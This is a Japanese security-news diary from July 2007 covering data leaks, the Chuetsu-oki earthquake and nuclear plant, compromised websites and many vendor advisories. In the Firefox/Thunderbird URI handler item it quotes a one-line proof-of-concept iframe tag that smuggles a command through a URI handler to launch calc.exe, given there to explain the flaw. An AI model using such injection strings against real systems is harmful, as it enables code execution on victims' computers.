》 ウィニーで個人情報2990人分流出、損保ジャパンなど (読売, 7/23)、代理店のパソコンのウイルス感染による情報流出について (損保ジャパン, 7/23)
》 「第5世代」ステルス実験機開発へ…防衛省方針 (読売, 7/24)。第 5 世代戦闘機 (F-22 級) の実験機を自前でつくるのだそうです。
》 飲酒運転の半数「アルコール依存症」…調査で相関関係判明 (読売, 7/20)。半数もですか。
》 インドネシア:サッカー・アジアカップ開催に伴う注意喚起 (外務省, 7/23)
》 改めてOpenLDAPはじめませんか?第3回:OpenLDAPによる認証基盤構築例 (thinkit, 7/23)
少なくとも、「国際社会」にタリバンの存在感とアフガンの現状を示すという意味では大成功だよなあ。
》 中国製トラック用タイヤチューブ、14・3%が強度不足 (読売, 7/23)
一方、同社は中越沖地震の震央から同原発までの距離を、従来の9キロから16キロに修正した。なんだこれ……
京都大原子炉実験所の小出裕章助教(原子核工学)の話 使用中に地震が来ていたら、大事故につながった可能性がある。燃料が落下すれば、破損して放射能漏れにつながるし、使用済み核燃料プールに重いものが落下すれば、燃料を納めたラックが破損して、臨界事故になる可能性もある。想定外の危険がどの程度あるのか、国や電力会社は早急に明らかにすべきだ。
先の通常国会では「保険料徴収などの経費は給付と密接不可分なコスト」(柳沢伯夫厚労相)との理由で、給付以外への流用の恒久化を盛り込んだ社保庁改革関連法が成立。これにより、流用額は今後も膨らみ続けることが予想される。
Flashの脆弱性でWiiもフリーズ状態に (ITmedia, 2007.07.23)、Wii gets Flashed by a bug too! (symantec blog, 2007.07.20)。あれぇ? バージョン番号からすると、欠陥の影響を受けないはずなんだけどなぁ……。PS3 はどうなんだろう。
モーニングスター社 (www.morningstar.co.jp) トップページが「モーニングスターウエブサイトのご利用の皆さまへのお願い」になっています。Last Modified: は Mon, 23 Jul 2007 13:46:56 GMT です。昨夜ようやくですか……。google の「このサイトはコンピュータに損害を与える可能性があります」 表示は継続中です。
関連:
》 「PDFスパム」に続いて、「Excelスパム」が流行の兆し (日経 IT Pro, 7/23)、Spam Excel(s) (trendmicro blog, 7/22)
》 TOKKO - 特攻 - という映画が凄いらしい。 (ネタ元: 月刊『創』8月号の「言論の覚悟 TOKKO(特攻)」鈴木邦男)
月刊『創』8月号には Winny ねたとか朝鮮総連ねた、不二家ねたとかも出てますね。 阿蘇山大噴火さんの「バカ裁判傍聴記」があいかわらずおもしろい。パチンコな裁判でサッカーを熱く語る裁判長ですか……。
「投資信託を中心とした金融商品全般を第三者の立場から格付する情報専門サイト」 モーニングスター社 (www.morningstar.co.jp) が、1 週間ほど前から (いろいろな?) ウイルスがついたり剥がされたりしているようです。
モーニングスター社が「このサイトはコンピュータに損害を与える可能性があります。」になったにもあるように、ぐぐると、このサイトはコンピュータに損害を与える可能性がありますと言われてしまいます [画像]。 リンクをたどるとこんな感じ [画像]
…… @IT から関連記事出てます: 「このサイトはコンピュータに損害を与える可能性」 国内サイトにも警告——グーグルのマルウェア警告機能に存在感 (@IT, 2007.07.23)。モーニングスターとエキサイト携帯ホームページ (魔法のiらんど) を例に解説しています。
モーニングスターのプロダクトサービス部によると、同社サイトは7月17日ごろに実際にトロイの木馬型ウイルスである「Exploit-MS06-014」(マカフィーの解説ページ)に感染し、「アクセスすると危険な状態」(同部)となった。外部から指摘を受けてウイルスを駆除し、「いまはアクセスしても大丈夫」という。
いつから「大丈夫」なのか不明ですね。
ただ、「どういった形でウイルスに感染したのかはまだ特定できていない」ともいい、セキュリティベンダに調査と根本的な対策を依頼している。
本当に「いまはアクセスしても大丈夫」なのでしょうか……。
モーニングスター社 (www.morningstar.co.jp) トップページが「モーニングスターウエブサイトのご利用の皆さまへのお願い」になっています。Last Modified: は Mon, 23 Jul 2007 13:46:56 GMT です。昨夜ようやくですか……。google の「このサイトはコンピュータに損害を与える可能性があります」 表示は継続中です。
関連:
》 デング熱、東南アジアで大流行 夏休み旅行者に注意喚起 (asahi.com, 7/20)。地球温暖化ですから。
》 TBSラジオ、放送禁止歌を特別番組で一挙放送 (slashdot.jp, 7/20)
》 SpamAssassin を 3.1.8 から 3.2.1 にアップデートしたらちょっと誤検出しているっぽいので以下のようにしてみた。
score TVD_SPACE_RATIO 0
score FM_FRM_RN_L_BRACK 0
score FH_FROMEML_NOTLD 0
どうも特定の日本語なメールと相性悪いっぽいような。 関連: Tests Performed: v3.2.x (SpamAssassin)
》 ゼロデイの脅威を考える (日経 IT Pro)
》 だ捕されている2隻の日本漁船に関する聴聞開始:国際海洋法裁判所 (国連情報誌SUNブログ対応版, 7/20)
》 Web is the way to go? (SANS ISC, 7/20)
》 捜査資料流出で懲戒免職 警視庁、男性巡査長を (中日, 7/20) (魚拓)、情報流出 巡査長を懲戒免職 (NHK, 7/20) (魚拓)
》 米司法省,新たなID盗難対策法案を米国会に提出 (日経 IT Pro, 7/20)。http://www.idtheft.gov/ なんてサイトがあるんですね。
電子投票 love 系の人って、IT を盲目的に信用しすぎ (dark side を見なさすぎ) だと思うし。まあ、電子投票くそくらえ系の人は dark side ばかり見ているという話もありますが。
》 Old Vulnerabilities Can Still Haunt You (SANS ISC, 7/19)。修正忘れにご用心。
》 Snort 2.7 Now Available だそうです。
》 中越沖地震で官邸・内閣府に申し入れを行う (保坂展人のどこどこ日記, 7/19)
「現行の1つ前のMacBook(CoreDuo 2GHz)が今月13日に発火した」のだそうだ。 「アップルさまの希望により記事を削除」というのが、いかにもアップルですな。臭いものには蓋で GO!
MacBook出火、13日(金)のこと (はてな匿名ダイアリー, 2007.07.18)
アップルのMacBookが爆発炎上 (gigazine, 2007.03.13)。今回の件と同類?
MacBook および MacBook Pro のバッテリーアップデート (Apple)
注意:パフォーマンスの問題を引き起こしている原因に安全面でのリスクはありません。現在のバッテリーをそのままお使いいただけます。
このバッテリーアップデートは、すべての MacBook、MacBook Pro、および 2006 年 2 月から 2007 年 4 月の間に購入された予備のバッテリーでご利用いただけます。
(中略)
Intel Core Duo プロセッサ搭載の MacBook および MacBook Pro に関しては、このプログラムはバッテリーの修理保証が製品の購入日から最長 2 年間まで延長されます。
これとは別の話なのかもしれませんが、現実に火を吹いている状態で「安全面でのリスクはありません」と言われてもねえ……
CoreDuo の奴が特にだめだめなのかなぁ……?
東芝製 note PC でバッテリーが原因となる発火事故が 3 件発生。 昨年から話題になっている話とは別の話なので注意。 「当該ロットのバッテリを使用したバッテリパックの無償交換プログラム」を実施するそうなので、東芝製 note PC 利用者は確認を。
この欠陥ですが、Firefox だけでなく Thunderbird にも影響するそうです。
Thunderbird 2.0.0.5 で修正されるそうですが、Thunderbird 2.0.0.5 はまだ公開されていません。……とか言ってる間に出てました。
iDefense からも出てました: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability。 Microsoft 的には、Registering an Application to a URL Protocol (MSDN) でも広報していた仕様だったようで。MSDN に例示されていた note: URI ハンドラが実装された場合、
<iframe src='note:"|calc.exe '>
というタグで calc.exe が自動で起動されたようです。MSDN ページ、現在は改訂されています。
iDefense によると、少なくとも次の URI ハンドラに問題がある (あった) そうです。
HKEY_CLASSES_ROOT\FirefoxURL\shell HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell HKEY_CLASSES_ROOT\mailto\shell HKEY_CLASSES_ROOT\news\shell
globで任意コード実行の脆弱性 (yohgaki's blog, 2007.07.20)。fix としてメモリを初期化するコードが追加された。 CVE-2007-3806
JVN#34058672: Nessus のレポート出力機能において任意のスクリプトが実行される脆弱性。 Nessus 3.0.6 で修正されているそうです。
Kaspersky Anti-Virus 5.5 for Check Point Firewall-1: Critical Fix 1 (build 5.5.161.0) が 2007.07.12 に登場したそうで。anti-virus kernel がフリーズする問題 (CVE-2007-3906) が修正された他、日本語・中国語版 Windows で利用した場合に発生する問題などが修正されているそうな。
Microsoft DirectX RLE Compressed Targa Image File Heap Overflow Vulnerability (iDefense)。DirectX SDK (February 2006) や DirectX 9.0c に欠陥があり、June 2007 SDK では直ってるそうで。 CVE-2006-4183
IBM Tivoli Provisioning Manager for OS Deployment TFTP Blocksize DoS Vulnerability (iDefense)。Tivoli Provisioning Manager for OS Deployment 5.1 Fix Pack 3 で直っているそうで。 CVE-2007-3268
Computer Associates Alert Notification Server Multiple Buffer Overflow Vulnerabilities (iDefense)。 BrightStor ARCserve Backup r11.5 以前などに含まれる alert.exe < 8.0.255.0 に buffer overflow する欠陥があり、 patch が出てます。 CVE-2007-3825
Ipswitch IMail Server 2006 Multiple IMAP Buffer Overflow Vulnerabilities。 2006.21 版で直っているようです。
CVE-2007-3564。 libcurl 7.14.0 〜 7.16.3 を GnuTLS と組みあわせた場合に、証明書の有効期限切れや発行日の検証が行われないみたい。7.16.4 で直っているそうで。
》 情報セキュリティの法律、amazon では 3 週間待ちのようなので、著者おすすめの BK1 に発注し直し。さきほど発送済のメールがきた。
》 メール・アーカイブ: 不祥事を追究,コンプライアンス背景に普及へ (日経 IT Pro, 7/18)
》 権利者86団体がコピーワンス見直し問題でJEITAを批判 −「私的録音録画補償金制度は大前提」と改めて主張 (AV Watch, 7/17)
》 公安調査庁に関する質問主意書 (ESPIO, 7/19)
》 中国のメール配信を混乱させた「万里の検閲」 (ITmedia, 7/19) (魚拓)。グレートウォールがまた何かやっている (やっていた?) ようです。
》 シマンテック、企業向けセキュリティソフトの新版を発表 (日経 IT Pro, 7/19)。Endpoint Protection 11.0。
新版は、従来のAntiVirus Corporate Editionと、ウイルス対策機能とファイアウォール機能を備える「Client Security」を統合 (中略) メモリー使用量を抑えており、AntiVirus Corporate EditionとClient Securityを同時に利用する場合と比べて7割程度減ったという。
70% 減ってあなた……。以前のものがめちゃくちゃだったようにしか見えないのだが……
関連: 「これをエンドポイント・セキュリティの新標準に」,シマンテックが新製品発表 (日経 IT Pro, 7/19)、シマンテック、法人向けセキュリティの水準を引き上げる新製品、Symantec Endpoint Protection を発表 (シマンテック, 7/19)
》 公認会計士協会 「財務報告に係る内部統制の監査に関する実務上の取扱い」(公開草案)を公表。。。 (まるちゃんの情報セキュリティ気まぐれ日記, 7/18)
》 ドイツ:相次ぐ原発トラブル 「廃止」へ加速か (JANJAN, 7/19)
》 ソフトウエア等の脆弱性関連情報に関する届出状況 [2007年第2四半期(4月〜6月)] (IPA, 7/19)
》 恐怖のアンインストール (IIJIMASが勉強しようとしています, 7/18)。Microsoft 製品の地雷を踏んでしまった話。
》 『SiCKO』批判ブログに見るGoogleの広報戦略 (日経 BP, 7/19)
》 DNS,ボットネットの手中に落ちる (日経 IT Pro, 7/19)。関連: Backdoor Uses DNS as ‘Side Door’ (trendmicro blog, 7/12)、 BKDR_FONAMEBOT.A
》 SANS Future Vision 2007 Tokyo 方面
「産業スパイ」が抜けてる気がするなぁ……。株価に直結するような情報を内部から入手するための攻撃、なんてのもありそうだし。
中古機器でも、旧法(電気用品取締法)に適合していれば安全性は担保されている。それでも当時は「旧法適合品でも安全性が十分確認できない」などとし、中古販売時に再検査した上でPSEマークを貼付して販売するよう求めた。これは犯罪だよね……。
だが、経産省が改めて検査したところ、旧法とPSE法で安全基準に差がないことが判明した、という。「旧法とPSE法の基準に差がないと気づいていれば、5年や7年、10年という中途半端な経過措置はおくべきではなかった。出荷段階で安全が確保されていればいいというのは、旧法とPSE法で変わらない。中古品の販売時に改めて検査しなくてはならないというのは、いま考えるとおかしい」(本庄審議官)
また、経産省傘下の産業構造審議会製品安全小委員会は、今年7月4日発表した中間とりまとめ案で、旧法とPSE法で安全基準が変わっていないことを確認したことを踏まえて「PSEマークなしの中古機器販売容認を検討すべき」と報告した。
実は昨年から、多くの人に訴訟を勧められていた。だが進さんは「裁判はとてもじゃないが、できない」と言う。「訴えたい気持ちはあるが、3年の時間と 2000万円の費用がかかると聞いた。費用は支援していただけるとしても、店員は夫婦は2人きり。店を続けるためには、裁判はできない」(進さん)
》 運輸省と輸送関連企業のコンピュータにハッカーが集中攻撃——「数百のパスワード情報が盗み出されている」とセキュリティ・ベンダーが警鐘 (Open Tech Press, 7/19)。日本の運輸省かと思ってあせったが、米国の話。
しかし、運輸省は攻撃を受けたことに気が付いていないようだ。同省の広報担当者は7月17日、「システムが攻撃を受けたという記録は見つかっていない」と述べている。
》 ヨーロッパから配信されるスパムが急増、ソフォス調査 (Internet Watch, 7/19)、 Sophos reveals "dirty dozen" spam-relaying countries (Sophos, 7/18)、 ソフォス、最新の「スパム送信国ワースト12」を発表 〜 ヨーロッパから配信されるスパムが急増 〜 (Sophos, 7/18)
》 洪水に襲われたパキスタンに3800万ドルの支援を要請:OCHA (国連情報誌SUNブログ対応版, 7/19)
日本でも、ここ数日は中越沖地震への支援(もちろんこれも大事です)ばかりが報道されて、直前の台風4号及びこれに刺激された梅雨前線の活動による災害のことは報道されなくなって、どの程度の支援が必要なのか一般人はよくわからない状況です。それと類似のことが世界規模で起こってしまうわけです。
》 政商ベレゾフスキー氏の暗殺を計画 ロシア人を逮捕 (asahi.com, 7/19)。リトビネンコ暗殺関連ねた。
》 出会い系サイトに関連した犯罪防止リーフレット (警察庁, 6/29) ができてました。
》 有害ネット:1年間で6万件の通報 うち18件15人逮捕 (毎日, 7/19)。 インターネット・ホットラインセンターの 統計情報のページには 2006.06〜2007.03 しかないようじゃのう。
》 朝鮮総連本部事件:流用目的詐欺と断定 元長官ら再逮捕 (毎日, 7/19)
》 クレーン船、送電線を切断 2万世帯が停電 長崎・平戸 (asahi.com, 7/19)
》 「段ボール肉まんは捏造」 北京テレビが謝罪 (asahi.com, 7/19)
本来であれば事業継続性計画(BCP)の実行を確保するため、自動車や大手部品メーカーはリケン以外で同等部品の調達先を確保しておくべきだが、「高精度な部品であり、リケン以外からは調達していないのが実情」(大手部品メーカー)という。オンリーワンは single point of failure なんだよね……。
◆現在東電により公表されている情報の中でとりわけ深刻なのが、7号機の排気塔から通常は検出されない放射能が検出された件です。ただしなぜかこれだけは本社ではなく、 柏崎刈羽発電所からプレス発表されています。
17日16:01の時事通信によれば「ヨウ素131、同133、クロム51、コバルト60の放射性物質が検出された」としてあったのですが、同18:01になると「通常は検出されない気体状のヨウ素の放射性同位体や粒子状の放射性物質クロム51、コバルト60を検出した」と変わったのです。
ヨウ素133が消えてしまいました。東電の発表にはヨウ素としかなく、不自然というものです。時事通信の早とちりではなく、ほんとうにヨウ素133を確認していたとしたら、それは核燃料の破損を示唆することになり、重大です。
》 セキュリティ対策企業は警察のスパイウェアを検出すべきか? (CNET, 7/19)。Fedware という言葉があるんですね。 原文 Will security firms detect police spyware? (CNET) は更新されているのですが、翻訳版は更新前のものをベースにしているのかなあ。
》 Windows MediaのDRMを解除するソフトの最新版が登場 (ITmedia, 7/18)。FairUse4WM 1.3 fix 2 のことのようです。 関連: FairUse4WM v1.3 Fix2公開:Vista対応、Zune DRMも解除 (engadget, 7/15)。去年の今ごろは FairUse4WM の google での検索結果がごそっと消されて (Google 八分されて) いたように記憶していますが、今はそうでもないようで。
》 MSのセキュリティサポートは無料、それとも有料? ユーザーに混乱 (ITmedia, 7/18)。 Microsoft Patch support not Free? (SANS ISC, 7/15) の話。つづき: Microsoft Security Contact Pages (SANS ISC, 7/19)
Opera 9.22 登場。 data: URL の件 (CVE-2007-3819) を含め、 複数のセキュリティ修正がある模様。
関連: [Full-disclosure] iDefense Security Advisory 07.19.07: Opera Software Opera Web Browser BitTorrent Dangling Pointer Vulnerability。CVE-2007-3929
日本語な案内も出ました:
内訳:
| Critical: | |
| High: | |
| Moderate: | |
| Low: |
Mac OS X 10.4.x の MDNSResponder に関する 0-day な欠陥を利用したワームの PoC コードが実在する模様。関連: 24924 - Apple Mac OS X mDNSResponder Variant Unspecified Remote Code Execution Vulnerability (securityfocus)
検索順位が下がるだけならまだ理解できるけど、なぜわざわざこの文章が表示されるのかというのがよくわからないな……。いったいどういう「自動処理」なんだろう。
Semplice
(直接の関わりは無いが、Googleは「Stop Badware Coalition」なる団体に参加していながら、多くの悪質な詐欺ソフトウェアをスポンサード広告として表示していた過去がある(Googleの広告に潜む、マルウェア配布者による広告(2006年3月22日, Semplice) ...
blog.lucanian.net/ - 71k - キャッシュ - 関連ページ
Yahoo! Japan だと 3 位でこのように表示されますね。
Semplice
マルウェアの解説、対策、関連ニュースの考察。 ... Sempliceのトップへ > 雑文 カテゴリ >この記事への固定リンク ... 記事の転載や引用に際しては、Sempliceよりの転載と引用そしてリンクについてのお願いをまずは閲覧下さい。 ...blog.lucanian.net -ブックマーク:12人が登録-キャッシュ
》 Free commandline scanner (Panda Research, 7/18)。Panda では、非営利プロジェクトにマルウェア対策機能を組み込みたい場合に、Windows / Linux 版のコマンドラインスキャナを無償提供しているそうな。VirusTotal とかにはそれが入っているのだそうだ。 実行ファイルへのリンクあり。
》 ボーイング、Airborne Laserの高出力レーザー照射実験に成功 (technobahn, 7/18)、 Boeing-led Airborne Laser Team Actively Tracks Airborne Target, Compensates for Atmospheric Turbulence and Fires Surrogate High-Energy Laser (Boeing, 7/16)
》 魔法のiらんど、復活しています。匿名さん情報ありがとうございます。 不正アクセスによる サービス停止について (tosp.co.jp)
今回の不正アクセスは、極めて悪質かつ多大な被害を及ぼすものでした。ウィルスの一種ボットネットが「魔法のiらんど」のウェブサーバーに侵入、外部のサーバーからの指令を受けて不定期に起動し、「魔法のiらんど」のプログラムを一部改ざんする形跡が見られました。
状況をいまいち理解できてなさそうな雰囲気を感じてしまうのですが……。
「魔法のiらんど」は常に高いセキュリティ・システムのもとで運営を行ってまいりましたが、
……http://company.maho.jp/ の方により詳しい経緯が掲載されていました: 不正アクセスに関するご報告とサービス再開のお知らせ
2007年7月5日(金)23時にお客様からコンピュータ・ウィルス・チェック・ソフトが起動したとの一報を受け早速社内のユーザーサポートチームが調査しましたが、この時点ではウィルスによる影響は確認されませんでした。その後、7月6日(土)の11時頃に、社内にてコンピュータへの不正アクセスによるプログラムの改ざんを確認。一度は撃退するも、その後、複数回にわたって不正アクセスが確認されました。その都度防御策を施す事により、同日22時に不正アクセスは完全にストップ。当社は引き続き24時間体制で監視を実施しました。
翌7月7日(日)の16時30分頃、再び執拗な不正アクセスが確認されたため再度防御策を実施。以後、複数回に渡って、不正アクセスへの対処を繰り返し行いましたが、7月8日(日)10時、お客様のデータ確保を優先するため、書き込みサービスを完全停止。閲覧のみのサービスに切り替えました。その後も不正アクセスは収まらず、同日18時30分、1999年に「魔法のiらんど」がサービスを開始して以来はじめて、サービスを全面的に停止しました。
やっぱりカカクコムを彷彿とさせるような……
》 Web Site Expert #13 に SSL 特集 (水無月ばけらのえび日記, 7/18)
》 Flashもブロック対象の時期か... (yohgaki's blog, 7/18)。Flashblock アドオンですか。
》 インシデントの見抜きかた(1)Webサーバへの攻撃を見抜く (@IT, 7/13)
》 文部科学省大臣官房国際課長名による「国際連合安全保障理事会決議第 1747 号の履行について (依頼)」なんて文書が回覧されてきてびっくり。 このへんの話みたい。
本年3月、イランの核問題に関する国連安保理決議第1747号が全会一致で採択をされました。これを受けて、本日の閣議で、この決議を履行するため次の措置を講ずることを了解いたしました。これを受けてか外務省中東アフリカ局長から文部科学省国際統括官宛に 5/23 付で協力要請が出て、それが「国際連合安全保障理事会決議第 1747 号の履行について (依頼)」として流れ流れて手元まで届いた模様。
「国際連合安全保障理事会決議第 1747 号の履行について (依頼)」はこんな内容:
つきましては、大学及び公的研究機関におかれましては、国連安保理決議第 1737 号の附属書及び同第 1747 号の附属書 I に指定された者をはじめ、イランの核活動等に関与し、直接提携し又は支援を提供している個人を、国内で開催されるセミナー、研修等への参加を含め、我が国へ招待等することを控えていただきますようお願いいたします。
また、本年 4 月 26 日付 19 文科際第 24 号にて依頼したとおり、引き続き輸出管理体制の強化に向けた取組みを徹底していただくとともに、特にイラン人研究者及び学生との交流に際して、イランの核活動等に寄与するであろう分野の研究教育又は訓練が行われることのないようお願いいたします。
それにしても、この内容に
なお、教学部 (理工学部担当) では特に取りまとめ致しませんので、参加ご希望の方は個々でお申し込み下さい。
という案内文をつけてはいかんでしょ…… > 理工教務
》 ハリーに揺れる米キリスト教原理主義 ハリー・ポッターへの反発が映す米国政治の構図 (日経 BP, 7/18)
》 「2009年度には世界一セキュリティに厳しい会社に」、松下電器が2004年来の取り組みを披露 (日経 IT Pro, 7/18)
》 FIX: Stop error message when the Explorer.exe process crashes on a Windows XP SP2-based computer: "STOP 0xc0000005" (Microsoft)。 この patch、2007 年 8 月の Windows Update に含まれる予定だそうです。
》 You cannot deploy software updates on a computer that is running Microsoft Windows XP or Microsoft Windows Server 2003 (Microsoft)。 Msi.dll の access violation だそうで。有償 fix 出てます。
》 OLS2007-BOF (TOMOYO Linux)。Ottawa Linux Symposium での TOMOYO Linux BoF に関する詳細な報告。おつかれさまです。
実際に、Ottawaに行って、BoFのセッションを終えての感想としては、「メインラインに入れることこそが至上命題であり、LKMLへの投稿や今回の BoFはそのスタートにすぎない」ということを実感しました。TOMOYO Linuxは、これまでこつこつと1.4系の開発により機能を拡張してきましたが、LKMLに提案した2.0(LSM移植版)ではファイル強制アクセス制御の機能しかありません。その状態でAppArmorとの比較をされて、「ほとんど同じ」と思われていることにより損をしています。せめてネットワークの MACが実装できていれば印象も変わったことでしょう。
》 NECの無線LAN機器「Aterm」で不具合、まれに煙が発生 (日経 BP, 7/17)、【お詫びとお願い】AtermWL5400AP/WL54TEの不具合のお知らせとお詫び (121ware, 7/17)
》 東証 加ト吉の改善報告書 (まるちゃんの情報セキュリティ気まぐれ日記, 7/15)
》 基本情報技術者試験の内容が漏えい (日経 IT Pro, 7/13)。コンピュータ総合学園 HAL の web ページには、今に至るも何もないみたい。
》 年金積立金は誰が預かっているのか (保坂展人のどこどこ日記, 7/15)
》 電子申請のJRE脆弱性放置、各都道府県の状況 (高木浩光@自宅の日記, 7/15)
》 AV‐J369 防水SDオーディオプレーヤー ウイルス感染に関するお詫びとお願い (ツインバード, 7/12)
》 丸川珠代氏、選挙権なし…NYから帰国後3年、転入届未提出 (読売, 7/17)。選挙に行(か|け)ない候補ですか。
》 旅客機が着陸に失敗し炎上、200人死亡か サンパウロ (asahi.com, 7/18)。TAM の A320。こんな感じ。
》 ブロードバンド・ルーターの設定が変わっているかも 〜ドライブバイ・ファーミング〜 (日経 IT Pro, 7/17)
》 通信・放送の総合的な法体系に関する研究会中間取りまとめ」についてのパブリックコメント草稿 (崎山伸夫のBlog, 7/17)
》 米エネルギー省,セキュリティ侵害でカリフォルニア大学に300万ドルの罰金 (日経 IT Pro, 7/17)
》 台頭するPDFスパム——画像スパムに代わリ新たな脅威に、大半のスパム・フィルタは検知できず (Open Tech Press, 7/17)。現状の PDF spam は、マルウエア対策のTips,知りたくありませんか? (日経 IT Pro, 7/18) で紹介されている xdoc2txt とかを使うとロクな中身がないことがわかりますね。
》 公益法人白書:「国と密接」な半数以上で多額の役員報酬 (毎日, 7/17)
》 「平成19年(2007年)新潟県中越沖地震」の特集 (気象庁)
3号炉では外部電源を取り込む変圧器で火災が起きた。絶縁油が漏れ、何らかの理由で引火したためだろう。(中略) 鎮火までに2時間近くもかかったのは、消火剤の調達に時間がかかったからといわれている。油火災への備えがなかったことは深刻な不備と言わざるを得ない。
変圧器が機能しなければ、外部電源喪失事故という特に沸騰水型原発では恐れられている事故となる。直ちに非常用のディーゼル発電機が起動することになっているが、この起動の信頼性は必ずしも高くなく、地震により起動しない恐れもある。炉心燃料は自動停止した後も高熱を発しているため冷却を続ける必要があり、これに失敗すると燃料は溶融して高濃度の放射能が環境に放出されることになる。場合によってはその後に爆発を伴うこともあり得る。それほど重要なことを内包する火災だったが、東京電力は変圧器が機能し続けていたか、非常用電源が起動したかなどの重要な情報を発表していない。
私たち、福島みずほ党首を団長とする社民党調査団は昨日、交渉の末に原発の中に入っている。素直には入れてもらえなかったようですね。
同行した今井浩志社民党国対事務局長に話を聞いた。「原発のPRのためのサービスセンターで、東京電力と現場責任者と交渉して原発の建屋に入り、水漏れ事故の現場まで入りました。『本来は水を流すための給排水管ではないのに、水漏れが起きている。原因はわかりません』とのことでした。さらに、燃えた変圧器も見ている。「100メートル位手前までいきましたが、真っ黒焦げでした。それに、原発敷地内のアスファルトの被害は市内の道路よりも数段ひどかったのが印象的でした」
原子炉のある建屋の土台も、陥没・隆起しているのを確認したという。
一方、防災科研などが行った地震波や余震分布の解析で、中越沖地震を起こした断層が、柏崎刈羽原子力発電所がある陸地の直下まで延びている可能性が高いことが分かった。関連: 中越沖地震:原因の断層、原発直下まで? 深さ約20キロ (毎日, 7/18)、 原発直下に断層か、建設の前提に疑問 中越沖地震 (asahi.com, 7/18)
今回の震源は、同原発のほぼ北側約9キロ、深さ17キロの場所で、余震は震源から南西方向に分布している。こうしたデータをもとに、断層が動いた範囲を示す「断層面」を調べたところ、同原発真下の方向まで延びていた。
原発建設は直下に活断層がないことを大前提にしてきた。同原発は未知の断層が直下にあったとしてもM6.5程度までの地震しか起こさないとの想定で設計されていた。建設の前提が揺らいだことになる。
》 検証・耐震偽装 悪いのは誰か?何か?(16)やっぱり?捏造したのか?国交省 (JANJAN, 7/16)
ともかく小嶋氏は、「当初の検証値が0.37だった「グランドステージ下総中山」を、国交省は0.73と発表した。」と書いている。この検証をしたのは、国交省と国土技術政策総合研究所(国総研)であると藤田氏は指摘している。
また小嶋氏はグランドステージ浮間公園についても、「当初の検証値は0.4なのに、北区は0.7と公表した。」としている。
》 マルウエア対策のTips,知りたくありませんか? (日経 IT Pro, 7/18)。番宣記事。
》 このサイトはどんなところ?「aguse」でサイトをチェック (日経 IT Pro, 7/18)。whois + α ゲートウェイということでしょうか。
》 日本でもセキュリティ・インストラクターを募集、米SANSがNRIセキュアと共同で (日経 IT Pro, 7/17)。SANS ねた。
》 米フォーティネットCMO,「サイバー犯罪は水面下で進行している恐れがある」 (日経 IT Pro, 7/17)
「サイバー犯罪は,表面化しないものも数多い。欧米では,企業が競合企業にトロイの木馬を仕掛けるといった情報戦争も始まっている」と,スティーノンCMOは実情を明かす。「日本の企業も,競合他社を意識した情報漏洩対策を真剣に考える時期に来ている」
「氷山の一角」すら見えないことが多いのですが、実際マジヤバイみたいですぜ旦那方。NDA がらみで喋れない場面・人も多いしね。
》 戦車に乗った男性が携帯電話の基地局の鉄塔を次々と破壊 (gigazine, 7/17)。TOP に T-34 の画像があるので「エェッマジ?」と思ったが、実際の映像を見た限りでは「ハリボテ砲塔つきの M113」のような気が。戦車じゃないじゃん。
》 [AML 14915] Fw: 辺野古から緊急情報 2007年 7/17・22:00、・13:00、・10:00、・08:30、・04:30
iPhone搭載Webブラウザ「Safari」の電話発信機能にぜい弱性,SPI Dynamicsが警告 (日経 IT Pro, 2007.07.18)。ふつうの日本人には関係ないのですが……
Asterisk 方面
[Full-disclosure] ASA-2007-014: Stack buffer overflow in IAX2 channel driver 。 IAX2 チャンネルドライバに欠陥があり、buffer overflow が発生、remote から任意のコードを実行できる。 Asterisk Open Source では 1.2.22 / 1.4.8 で修正されている。 CVE-2007-3762
[Full-disclosure] ASA-2007-015: Remote Crash Vulnerability in IAX2 channel driver。 Asterisk Open Source では 1.2.22 / 1.4.8 で修正されている。 CVE-2007-3763。 PoC
[Full-disclosure] ASA-2007-016: Remote crash vulnerability in Skinny channel driver。 Asterisk Open Source では 1.2.22 / 1.4.8 で修正されている。 CVE-2007-3764
[Full-disclosure] ASA-2007-017: Remote Crash Vulnerability in STUN implementation。 Asterisk Open Source では 1.4.8 で修正されている。 CVE-2007-3765
[Full-disclosure] iDefense Security Advisory 07.17.07: Computer Associates Alert Notification Server Multiple Buffer Overflow Vulnerabilities。 remote から local SYSTEM 権限を取得できる。 patch があるので適用すればよい。 CVE-2007-3825
[Full-disclosure] iDefense Security Advisory 07.17.07: IBM Tivoli Provisioning Manager for OS Deployment TFTP Blocksize DoS Vulnerability。remote から DoS 攻撃を実施できる。 patch があるので適用すればよい。 CVE-2007-3268
トレンドマイクロの Client Server Messaging Security for Small and Medium Business 3.0 / 3.5 / 3.6、OfficeScan Corporate Edition 6.5 / 7.0 / 7.3 / 8.0、OfficeScan 6.0 in Client/Server/Messaging Suite for SMB 2.0 の CGI モジュールに 2 つの欠陥。
iDefense Security Advisory 07.16.07: Trend Micro OfficeScan Session Cookie Buffer Overflow Vulnerability。 CGIOCommon.dll に欠陥があり、長大なセッション cookie によって buffer overflow が発生、remote から IIS 動作権限で任意のコードを実行できる。 CVE-2007-3454
iDefense Security Advisory 07.16.07: Trend Micro OfficeScan Management Console Authorization Bypass Vulnerability。 cgiChkMasterPwd.exe に欠陥があり、remote から無認証で Web 管理コンソールに接続できてしまう。 CVE-2007-3455
patch が出ているので適用すればよい。
Client Server Messaging Security for Small and Medium Business は日本で言うところの ウイルスバスター ビジネスセキュリティ、 OfficeScan は ウイルスバスター コーポレートエディション でいいんですかね。ダウンロードページ:
今回のモノの日本語版はまだありません。
US では 2006.10.19 に登場している Client/Server/Messaging Security 3.0 Patch 1 for SP1 は、日本では 2007.04.18 ですね (ウイルスバスタービジネスセキュリティ 3.0 用 Service Pack 1 Patch 1)。トレンドマイクロのリリースエンジニアリングってどうなってるの? なんだか 1990 年代のマイクロソフトを連想してしまうのですけど。
日本語版 patch 出ました。
ウイルスバスター コーポレートエディション 8.0 用の patch ですが、英語版は build 1042 なのに日本語版は build 1043 ですね。
Oracle patch 2007.07 版出ました。
Web アプリの出力において、IE が正しく判別できない charset が指定されていると、IE はそれを UTF-7 と誤認する場合があり、その場合に XSS 欠陥が発現する話。 IE が正しく判別できる charset は HKCR\MIME\Database\charset に列挙されているそうだ。
Free ePO Vulnerability Scanner (eEye Research, 2007.07.17)
Firefox 2.0.0.5 が登場しました。 ハンドラですが、次のようになっています。
